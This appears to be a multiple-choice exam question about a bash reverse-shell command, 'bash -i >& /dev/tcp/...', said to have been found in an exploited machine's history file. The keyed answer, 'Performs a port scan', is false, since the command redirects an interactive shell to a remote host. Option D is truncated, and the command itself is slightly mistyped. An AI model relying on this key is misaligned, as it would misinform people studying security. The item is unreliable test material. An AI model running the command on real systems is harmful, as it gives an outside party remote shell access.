The following line was found in an exploited machine’s history file.
An attacker ran the following command:
bash -i >& /dev/tcp/192.168.0.1/80 0> &1
Which of the following describes what the command does?
A . Performs a port scan.
B . Grabs the web server’s banner.
C . Redirects a TTY to a remote system.
D . Removes error logs for the supplied I
Answer: A